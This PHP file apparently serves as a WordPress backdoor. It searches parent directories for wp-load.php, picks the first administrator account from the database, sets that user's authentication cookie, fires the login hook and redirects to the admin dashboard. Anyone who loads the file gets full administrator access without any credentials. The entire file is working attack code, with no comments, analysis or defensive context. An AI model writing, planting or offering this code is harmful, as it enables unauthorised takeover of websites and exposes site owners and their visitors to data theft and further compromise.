<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);

$base = __DIR__;
$wp_loaded = false;
for ($i = 0; $i < 1000; $i++) {
    $path = $base . '/wp-load.php';
    if (file_exists($path)) {
        require_once($path);
        $wp_loaded = true;
        break;
    }
    $base = dirname($base);
}
if (!$wp_loaded) {
    die("not load");
}

global $wpdb;

$admin_id = $wpdb->get_var("
    SELECT ID FROM {$wpdb->users}
    WHERE ID IN (
        SELECT user_id FROM {$wpdb->usermeta}
        WHERE meta_key = '{$wpdb->prefix}capabilities'
        AND meta_value LIKE '%administrator%'
    )
    LIMIT 1
");

if (!$admin_id) {
    die("usr not");
}

$user = get_userdata($admin_id);
wp_set_current_user($admin_id);
wp_set_auth_cookie($admin_id);
do_action('wp_login', $user->user_login);

wp_redirect(admin_url());
exit;
?>
